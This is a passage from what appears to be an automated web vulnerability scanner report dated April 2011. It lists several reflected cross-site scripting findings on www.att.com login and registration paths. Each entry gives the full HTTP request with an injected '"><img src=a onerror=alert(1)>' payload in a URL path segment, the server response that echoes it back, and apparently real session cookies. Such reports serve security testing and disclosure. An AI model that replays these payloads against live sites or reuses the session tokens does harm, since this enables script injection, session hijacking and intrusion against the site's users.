Cookie: TLTSID=CFC3987A712410711B27EDDFEFA2AC4B; TLTUID=CFC3987A712410711B27EDDFEFA2AC4B; B2CSESSIONID=QpmbN4kFk2JVFn!966987163; DYN_USER_ID=3831805542; DYN_USER_CONFIRM=1235118b78dcad6811997a70c965cc03; cust_type=new; svariants=NA; BIGipServerpATTWL_7010_7011=3756118407.25115.0000; ECOM_GTM=owaln_osaln; DL3K=32nnnTa266WTriDckoD4M0ANMDOHT6md0slP1JdMoR5q-14ohahhI_A; bn_u=6923522882713032529; wtAka=y; op704wirelesssearchlandingpage1gum=a005005004274ri19c6a28261; op704wirelesssearchlandingpage1liid=a005005004274ri19c6a28261; BCNSESS=run=false; JSID_coredisp=0000ZcQz-B6qJ54k94jufOkeS6v:14cs3nf6m; DTAB=Tab=Bus; busHomeBox1=0; busHomeBox2=0; busHomeBox3=0; busHomeBox4=0; colam_ctn=l%3Den_US; TLTHID=53E74CF07125107191619E552188C3F4; EDOCSSESSIONID=LcHnN4lDXdLZ1N0cZc1BhKTv3CvHv8ywTx1r524x2P2CgpccQ7Ly!-744530585; browserid=A001533839947; stack=doammw08; fsr.s=%7B%22cp%22%3A%7B%22customer_type%22%3A%22current%22%2C%22app_visitor_cookie%22%3A%22A001533839947%22%2C%22poc_login%22%3A%22no%22%2C%22mc%22%3A%22ICcs4CSUB0000000L%22%2C%22sd%22%3A%22c-wireless-sales%22%2C%22config_version%22%3A%22009A%22%2C%22code_version%22%3A%226.3.0%22%2C%22role%22%3A%22null%22%2C%22time%22%3A%22Wed%20Apr%2027%2018%3A23%3A20%20CDT%202011%22%2C%22ctn%22%3A%22%22%2C%22user_type%22%3A%22TELCO%22%7D%2C%22rid%22%3A%221303946450313_179502%22%2C%22v%22%3A2%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fwww.wireless.att.com%2Fcell-phone-service%2Fwelcome%2Findex.jsp%22%2C%22pv%22%3A1%2C%22lc%22%3A%7B%22d8%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%2C%22e%22%3A1%7D%7D%2C%22cd%22%3A8%2C%22sd%22%3A8%7D; fsr.a=1303946628870

Response

HTTP/1.1 404 Not Found
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html; charset=UTF-8
Content-Length: 9089
Vary: Accept-Encoding
Date: Wed, 27 Apr 2011 23:25:35 GMT
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">


<head>
   <title
...[SNIP]...
<meta name="DCSext.failedurl" content="https://www.att.com:443/olam/js6e2da"><img src=a onerror=alert(1)>104eda6ef9b/validate.js">
...[SNIP]...

1.15. https://www.att.com/olam/js/validate.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.att.com
Path:   /olam/js/validate.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b30a1"><img%20src%3da%20onerror%3dalert(1)>64669caebf6 was submitted in the REST URL parameter 3. This input was echoed as b30a1"><img src=a onerror=alert(1)>64669caebf6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /olam/js/validate.jsb30a1"><img%20src%3da%20onerror%3dalert(1)>64669caebf6 HTTP/1.1
Host: www.att.com
Connection: keep-alive
Referer: https://www.att.com/olam/registrationAction.olamexecute
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=CFC3987A712410711B27EDDFEFA2AC4B; TLTUID=CFC3987A712410711B27EDDFEFA2AC4B; B2CSESSIONID=QpmbN4kFk2JVFn!966987163; DYN_USER_ID=3831805542; DYN_USER_CONFIRM=1235118b78dcad6811997a70c965cc03; cust_type=new; svariants=NA; BIGipServerpATTWL_7010_7011=3756118407.25115.0000; ECOM_GTM=owaln_osaln; DL3K=32nnnTa266WTriDckoD4M0ANMDOHT6md0slP1JdMoR5q-14ohahhI_A; bn_u=6923522882713032529; wtAka=y; op704wirelesssearchlandingpage1gum=a005005004274ri19c6a28261; op704wirelesssearchlandingpage1liid=a005005004274ri19c6a28261; BCNSESS=run=false; JSID_coredisp=0000ZcQz-B6qJ54k94jufOkeS6v:14cs3nf6m; DTAB=Tab=Bus; busHomeBox1=0; busHomeBox2=0; busHomeBox3=0; busHomeBox4=0; colam_ctn=l%3Den_US; TLTHID=53E74CF07125107191619E552188C3F4; EDOCSSESSIONID=LcHnN4lDXdLZ1N0cZc1BhKTv3CvHv8ywTx1r524x2P2CgpccQ7Ly!-744530585; browserid=A001533839947; stack=doammw08; fsr.s=%7B%22cp%22%3A%7B%22customer_type%22%3A%22current%22%2C%22app_visitor_cookie%22%3A%22A001533839947%22%2C%22poc_login%22%3A%22no%22%2C%22mc%22%3A%22ICcs4CSUB0000000L%22%2C%22sd%22%3A%22c-wireless-sales%22%2C%22config_version%22%3A%22009A%22%2C%22code_version%22%3A%226.3.0%22%2C%22role%22%3A%22null%22%2C%22time%22%3A%22Wed%20Apr%2027%2018%3A23%3A20%20CDT%202011%22%2C%22ctn%22%3A%22%22%2C%22user_type%22%3A%22TELCO%22%7D%2C%22rid%22%3A%221303946450313_179502%22%2C%22v%22%3A2%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fwww.wireless.att.com%2Fcell-phone-service%2Fwelcome%2Findex.jsp%22%2C%22pv%22%3A1%2C%22lc%22%3A%7B%22d8%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%2C%22e%22%3A1%7D%7D%2C%22cd%22%3A8%2C%22sd%22%3A8%7D; fsr.a=1303946628870

Response

HTTP/1.1 404 Not Found
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html; charset=UTF-8
Content-Length: 9089
Vary: Accept-Encoding
Date: Wed, 27 Apr 2011 23:25:40 GMT
Connection: keep-alive
Set-Cookie: TLTHID=AA0FC86E7125107197889E552188C3F4; path=/; domain=.att.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">


<head>
   <title
...[SNIP]...
<meta name="DCSext.failedurl" content="https://www.att.com:443/olam/js/validate.jsb30a1"><img src=a onerror=alert(1)>64669caebf6">
...[SNIP]...

1.16. https://www.att.com/olam/jsp/tiles/common_includes/cGateCookie.jsp [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.att.com
Path:   /olam/jsp/tiles/common_includes/cGateCookie.jsp

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a74e"><img%20src%3da%20onerror%3dalert(1)>ecfdccfc84d was submitted in the REST URL parameter 2. This input was echoed as 7a74e"><img src=a onerror=alert(1)>ecfdccfc84d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /olam/jsp7a74e"><img%20src%3da%20onerror%3dalert(1)>ecfdccfc84d/tiles/common_includes/cGateCookie.jsp?userType=&isLogout= HTTP/1.1
Host: www.att.com
Connection: keep-alive
Referer: https://www.att.com/olam/loginAction.olamexecute?customerType=L
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=CFC3987A712410711B27EDDFEFA2AC4B; TLTUID=CFC3987A712410711B27EDDFEFA2AC4B; B2CSESSIONID=QpmbN4kFk2JVFn!966987163; DYN_USER_ID=3831805542; DYN_USER_CONFIRM=1235118b78dcad6811997a70c965cc03; cust_type=new; svariants=NA; BIGipServerpATTWL_7010_7011=3756118407.25115.0000; ECOM_GTM=owaln_osaln; DL3K=32nnnTa266WTriDckoD4M0ANMDOHT6md0slP1JdMoR5q-14ohahhI_A; bn_u=6923522882713032529; wtAka=y; op704wirelesssearchlandingpage1gum=a005005004274ri19c6a28261; op704wirelesssearchlandingpage1liid=a005005004274ri19c6a28261; BCNSESS=run=false; JSID_coredisp=0000ZcQz-B6qJ54k94jufOkeS6v:14cs3nf6m; DTAB=Tab=Bus; busHomeBox1=0; busHomeBox2=0; busHomeBox3=0; busHomeBox4=0; colam_ctn=l%3Den_US; TLTHID=53E74CF07125107191619E552188C3F4; EDOCSSESSIONID=LcHnN4lDXdLZ1N0cZc1BhKTv3CvHv8ywTx1r524x2P2CgpccQ7Ly!-744530585; browserid=A001533839947; stack=doammw08; fsr.s=%7B%22cp%22%3A%7B%22customer_type%22%3A%22current%22%2C%22app_visitor_cookie%22%3A%22A001533839947%22%2C%22poc_login%22%3A%22no%22%2C%22mc%22%3A%22ICcs4CSUB0000000L%22%2C%22sd%22%3A%22c-wireless-sales%22%2C%22config_version%22%3A%22009A%22%2C%22code_version%22%3A%226.3.0%22%2C%22role%22%3A%22null%22%2C%22time%22%3A%22Wed%20Apr%2027%2018%3A23%3A20%20CDT%202011%22%2C%22ctn%22%3A%22%22%2C%22user_type%22%3A%22TELCO%22%7D%2C%22rid%22%3A%221303946450313_179502%22%2C%22v%22%3A2%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fwww.wireless.att.com%2Fcell-phone-service%2Fwelcome%2Findex.jsp%22%2C%22pv%22%3A1%2C%22lc%22%3A%7B%22d8%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%2C%22e%22%3A1%7D%7D%2C%22cd%22%3A8%2C%22sd%22%3A8%7D; fsr.a=1303946630070

Response

HTTP/1.1 404 Not Found
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html; charset=UTF-8
Content-Length: 9116
Vary: Accept-Encoding
Date: Wed, 27 Apr 2011 23:24:22 GMT
Connection: keep-alive
Set-Cookie: TLTHID=7B847E367125107193929E552188C3F4; path=/; domain=.att.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">


<head>
   <title
...[SNIP]...
<meta name="DCSext.failedurl" content="https://www.att.com:443/olam/jsp7a74e"><img src=a onerror=alert(1)>ecfdccfc84d/tiles/common_includes/cGateCookie.jsp">
...[SNIP]...

1.17. https://www.att.com/olam/jsp/tiles/common_includes/cGateCookie.jsp [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.att.com
Path:   /olam/jsp/tiles/common_includes/cGateCookie.jsp

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aec42"><img%20src%3da%20onerror%3dalert(1)>cacb75c2462 was submitted in the REST URL parameter 3. This input was echoed as aec42"><img src=a onerror=alert(1)>cacb75c2462 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /olam/jsp/tilesaec42"><img%20src%3da%20onerror%3dalert(1)>cacb75c2462/common_includes/cGateCookie.jsp?userType=&isLogout= HTTP/1.1
Host: www.att.com
Connection: keep-alive
Referer: https://www.att.com/olam/loginAction.olamexecute?customerType=L
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=CFC3987A712410711B27EDDFEFA2AC4B; TLTUID=CFC3987A712410711B27EDDFEFA2AC4B; B2CSESSIONID=QpmbN4kFk2JVFn!966987163; DYN_USER_ID=3831805542; DYN_USER_CONFIRM=1235118b78dcad6811997a70c965cc03; cust_type=new; svariants=NA; BIGipServerpATTWL_7010_7011=3756118407.25115.0000; ECOM_GTM=owaln_osaln; DL3K=32nnnTa266WTriDckoD4M0ANMDOHT6md0slP1JdMoR5q-14ohahhI_A; bn_u=6923522882713032529; wtAka=y; op704wirelesssearchlandingpage1gum=a005005004274ri19c6a28261; op704wirelesssearchlandingpage1liid=a005005004274ri19c6a28261; BCNSESS=run=false; JSID_coredisp=0000ZcQz-B6qJ54k94jufOkeS6v:14cs3nf6m; DTAB=Tab=Bus; busHomeBox1=0; busHomeBox2=0; busHomeBox3=0; busHomeBox4=0; colam_ctn=l%3Den_US; TLTHID=53E74CF07125107191619E552188C3F4; EDOCSSESSIONID=LcHnN4lDXdLZ1N0cZc1BhKTv3CvHv8ywTx1r524x2P2CgpccQ7Ly!-744530585; browserid=A001533839947; stack=doammw08; fsr.s=%7B%22cp%22%3A%7B%22customer_type%22%3A%22current%22%2C%22app_visitor_cookie%22%3A%22A001533839947%22%2C%22poc_login%22%3A%22no%22%2C%22mc%22%3A%22ICcs4CSUB0000000L%22%2C%22sd%22%3A%22c-wireless-sales%22%2C%22config_version%22%3A%22009A%22%2C%22code_version%22%3A%226.3.0%22%2C%22role%22%3A%22null%22%2C%22time%22%3A%22Wed%20Apr%2027%2018%3A23%3A20%20CDT%202011%22%2C%22ctn%22%3A%22%22%2C%22user_type%22%3A%22TELCO%22%7D%2C%22rid%22%3A%221303946450313_179502%22%2C%22v%22%3A2%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fwww.wireless.att.com%2Fcell-phone-service%2Fwelcome%2Findex.jsp%22%2C%22pv%22%3A1%2C%22lc%22%3A%7B%22d8%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%2C%22e%22%3A1%7D%7D%2C%22cd%22%3A8%2C%22sd%22%3A8%7D; fsr.a=1303946630070

Response

HTTP/1.1 404 Not Found
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html; charset=UTF-8
Content-Length: 9116
Vary: Accept-Encoding
Date: Wed, 27 Apr 2011 23:24:25 GMT
Connection: keep-alive
Set-Cookie: TLTHID=7D6B76C87125107193DC9E552188C3F4; path=/; domain=.att.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">


<head>
   <title
...[SNIP]...
<meta name="DCSext.failedurl" content="https://www.att.com:443/olam/jsp/tilesaec42"><img src=a onerror=alert(1)>cacb75c2462/common_includes/cGateCookie.jsp">
...[SNIP]...

1.18. https://www.att.com/olam/jsp/tiles/common_includes/cGateCookie.jsp [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.att.com
Path:   /olam/jsp/tiles/common_includes/cGateCookie.jsp

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec1df"><img%20src%3da%20onerror%3dalert(1)>5e8c45dc087 was submitted in the REST URL parameter 4. This input was echoed as ec1df"><img src=a onerror=alert(1)>5e8c45dc087 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /olam/jsp/tiles/common_includesec1df"><img%20src%3da%20onerror%3dalert(1)>5e8c45dc087/cGateCookie.jsp?userType=&isLogout= HTTP/1.1
Host: www.att.com
Connection: keep-alive
Referer: https://www.att.com/olam/registrationAction.olamexecute
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=CFC3987A712410711B27EDDFEFA2AC4B; TLTUID=CFC3987A712410711B27EDDFEFA2AC4B; B2CSESSIONID=QpmbN4kFk2JVFn!966987163; DYN_USER_ID=3831805542; DYN_USER_CONFIRM=1235118b78dcad6811997a70c965cc03; cust_type=new; svariants=NA; BIGipServerpATTWL_7010_7011=3756118407.25115.0000; ECOM_GTM=owaln_osaln; DL3K=32nnnTa266WTriDckoD4M0ANMDOHT6md0slP1JdMoR5q-14ohahhI_A; bn_u=6923522882713032529; wtAka=y; op704wirelesssearchlandingpage1gum=a005005004274ri19c6a28261; op704wirelesssearchlandingpage1liid=a005005004274ri19c6a28261; BCNSESS=run=false; JSID_coredisp=0000ZcQz-B6qJ54k94jufOkeS6v:14cs3nf6m; DTAB=Tab=Bus; busHomeBox1=0; busHomeBox2=0; busHomeBox3=0; busHomeBox4=0; colam_ctn=l%3Den_US; EDOCSSESSIONID=LcHnN4lDXdLZ1N0cZc1BhKTv3CvHv8ywTx1r524x2P2CgpccQ7Ly!-744530585; browserid=A001533839947; stack=doammw08; TLTHID=638F77867125107191D59E552188C3F4; fsr.s=%7B%22cp%22%3A%7B%22customer_type%22%3A%22current%22%2C%22app_visitor_cookie%22%3A%22A001533839947%22%2C%22poc_login%22%3A%22no%22%2C%22mc%22%3A%22ICcs4CSUB0000000L%22%2C%22sd%22%3A%22c-wireless-sales%22%2C%22config_version%22%3A%22009A%22%2C%22code_version%22%3A%226.3.0%22%2C%22role%22%3A%22null%22%2C%22time%22%3A%22Wed%20Apr%2027%2018%3A23%3A20%20CDT%202011%22%2C%22ctn%22%3A%22%22%2C%22user_type%22%3A%22N%22%7D%2C%22rid%22%3A%221303946450313_179502%22%2C%22v%22%3A2%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fwww.wireless.att.com%2Fcell-phone-service%2Fwelcome%2Findex.jsp%22%2C%22pv%22%3A1%2C%22lc%22%3A%7B%22d8%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%2C%22e%22%3A1%7D%7D%2C%22cd%22%3A8%2C%22sd%22%3A8%7D

Response

HTTP/1.1 404 Not Found
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html; charset=UTF-8
Content-Length: 9116
Vary: Accept-Encoding
Date: Wed, 27 Apr 2011 23:24:28 GMT
Connection: keep-alive
Set-Cookie: TLTHID=7F62D0167125107194519E552188C3F4; path=/; domain=.att.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">


<head>
   <title
...[SNIP]...
<meta name="DCSext.failedurl" content="https://www.att.com:443/olam/jsp/tiles/common_includesec1df"><img src=a onerror=alert(1)>5e8c45dc087/cGateCookie.jsp">
...[SNIP]...

1.19. https://www.att.com/olam/jsp/tiles/common_includes/cGateCookie.jsp [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.att.com
Path:   /olam/jsp/tiles/common_includes/cGateCookie.jsp

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a6a02"><img%20src%3da%20onerror%3dalert(1)>25f7193c2f8 was submitted in the REST URL parameter 5. This input was echoed as a6a02"><img src=a onerror=alert(1)>25f7193c2f8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /olam/jsp/tiles/common_includes/cGateCookie.jspa6a02"><img%20src%3da%20onerror%3dalert(1)>25f7193c2f8?userType=&isLogout= HTTP/1.1
Host: www.att.com
Connection: keep-alive
Referer: https://www.att.com/olam/loginAction.olamexecute?customerType=L
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=CFC3987A712410711B27EDDFEFA2AC4B; TLTUID=CFC3987A712410711B27EDDFEFA2AC4B; B2CSESSIONID=QpmbN4kFk2JVFn!966987163; DYN_USER_ID=3831805542; DYN_USER_CONFIRM=1235118b78dcad6811997a70c965cc03; cust_type=new; svariants=NA; BIGipServerpATTWL_7010_7011=3756118407.25115.0000; ECOM_GTM=owaln_osaln; DL3K=32nnnTa266WTriDckoD4M0ANMDOHT6md0slP1JdMoR5q-14ohahhI_A; bn_u=6923522882713032529; wtAka=y; op704wirelesssearchlandingpage1gum=a005005004274ri19c6a28261; op704wirelesssearchlandingpage1liid=a005005004274ri19c6a28261; BCNSESS=run=false; JSID_coredisp=0000ZcQz-B6qJ54k94jufOkeS6v:14cs3nf6m; DTAB=Tab=Bus; busHomeBox1=0; busHomeBox2=0; busHomeBox3=0; busHomeBox4=0; colam_ctn=l%3Den_US; TLTHID=53E74CF07125107191619E552188C3F4; EDOCSSESSIONID=LcHnN4lDXdLZ1N0cZc1BhKTv3CvHv8ywTx1r524x2P2CgpccQ7Ly!-744530585; browserid=A001533839947; stack=doammw08; fsr.s=%7B%22cp%22%3A%7B%22customer_type%22%3A%22current%22%2C%22app_visitor_cookie%22%3A%22A001533839947%22%2C%22poc_login%22%3A%22no%22%2C%22mc%22%3A%22ICcs4CSUB0000000L%22%2C%22sd%22%3A%22c-wireless-sales%22%2C%22config_version%22%3A%22009A%22%2C%22code_version%22%3A%226.3.0%22%2C%22role%22%3A%22null%22%2C%22time%22%3A%22Wed%20Apr%2027%2018%3A23%3A20%20CDT%202011%22%2C%22ctn%22%3A%22%22%2C%22user_type%22%3A%22TELCO%22%7D%2C%22rid%22%3A%221303946450313_179502%22%2C%22v%22%3A2%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fwww.wireless.att.com%2Fcell-phone-service%2Fwelcome%2Findex.jsp%22%2C%22pv%22%3A1%2C%22lc%22%3A%7B%22d8%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%2C%22e%22%3A1%7D%7D%2C%22cd%22%3A8%2C%22sd%22%3A8%7D; fsr.a=1303946630070

Response

HTTP/1.1 404 Not Found
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html; charset=UTF-8
Content-Length: 9116
Vary: Accept-Encoding
Date: Wed, 27 Apr 2011 23:24:32 GMT
Connection: keep-alive
Set-Cookie: TLTHID=8151776A7125107194A89E552188C3F4; path=/; domain=.att.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">


<head>
   <title
...[SNIP]...
<meta name="DCSext.failedurl" content="https://www.att.com:443/olam/jsp/tiles/common_includes/cGateCookie.jspa6a02"><img src=a onerror=alert(1)>25f7193c2f8">
...[SNIP]...

1.20. https://www.att.com/olam/loginAction.olamexecute [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.att.com
Path:   /olam/loginAction.olamexecute

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4776"><img%20src%3da%20onerror%3dalert(1)>308930536fd was submitted in the REST URL parameter 2. This input was echoed as d4776"><img src=a onerror=alert(1)>308930536fd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /olam/loginAction.olamexecuted4776"><img%20src%3da%20onerror%3dalert(1)>308930536fd?customerType=L HTTP/1.1
Host: www.att.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=CFC3987A712410711B27EDDFEFA2AC4B; TLTUID=CFC3987A712410711B27EDDFEFA2AC4B; B2CSESSIONID=QpmbN4kFk2JVFn!966987163; DYN_USER_ID=3831805542; DYN_USER_CONFIRM=1235118b78dcad6811997a70c965cc03; cust_type=new; browserid=A001533839947; svariants=NA; BIGipServerpATTWL_7010_7011=3756118407.25115.0000; ECOM_GTM=owaln_osaln; DL3K=32nnnTa266WTriDckoD4M0ANMDOHT6md0slP1JdMoR5q-14ohahhI_A; bn_u=6923522882713032529; wtAka=y; op704wirelesssearchlandingpage1gum=a005005004274ri19c6a28261; op704wirelesssearchlandingpage1liid=a005005004274ri19c6a28261; BCNSESS=run=false; JSID_coredisp=0000ZcQz-B6qJ54k94jufOkeS6v:14cs3nf6m; TLTHID=EF42DE367124107128A6B78052916767; fsr.s=%7B%22cp%22%3A%7B%22customer_type%22%3A%22new%22%2C%22app_visitor_cookie%22%3A%22A001533839947%22%2C%22poc_login%22%3A%22no%22%2C%22mc%22%3A%22ICcs4CSUB0000000L%22%2C%22sd%22%3A%22c-wireless-sales%22%2C%22config_version%22%3A%22009A%22%2C%22code_version%22%3A%226.3.0%22%7D%2C%22rid%22%3A%221303946450313_179502%22%2C%22v%22%3A2%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fwww.wireless.att.com%2Fcell-phone-service%2Fwelcome%2Findex.jsp%22%2C%22pv%22%3A1%2C%22lc%22%3A%7B%22d8%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%2C%22e%22%3A1%7D%7D%2C%22cd%22%3A8%2C%22sd%22%3A8%7D; DTAB=Tab=Bus

Response

HTTP/1.1 404 Not Found
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache="set-cookie"
Content-Length: 9098
Vary: Accept-Encoding
Date: Wed, 27 Apr 2011 23:24:28 GMT
Connection: keep-alive
Set-Cookie: TLTHID=7F0480B07125107136EDBF35521FC8B5; path=/; domain=.att.com
Set-Cookie: EDOCSSESSIONID=m52bN4lM1mnk00dTHnTxyFhZQF6gFnQw6XXgcY9r0KPLgmVTxLJs!-651781025; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">


<head>
   <title
...[SNIP]...
<meta name="DCSext.failedurl" content="https://www.att.com:443/olam/loginAction.olamexecuted4776"><img src=a onerror=alert(1)>308930536fd">
...[SNIP]...

1.21. https://www.att.com/olam/registrationAction.olamexecute [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.att.com
Path:   /olam/registrationAction.olamexecute

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6579b"><img%20src%3da%20onerror%3dalert(1)>6a711fed7d8 was submitted in the REST URL parameter 2. This input was echoed as 6579b"><img src=a onerror=alert(1)>6a711fed7d8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /olam/registrationAction.olamexecute6579b"><img%20src%3da%20onerror%3dalert(1)>6a711fed7d8 HTTP/1.1
Host: www.att.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
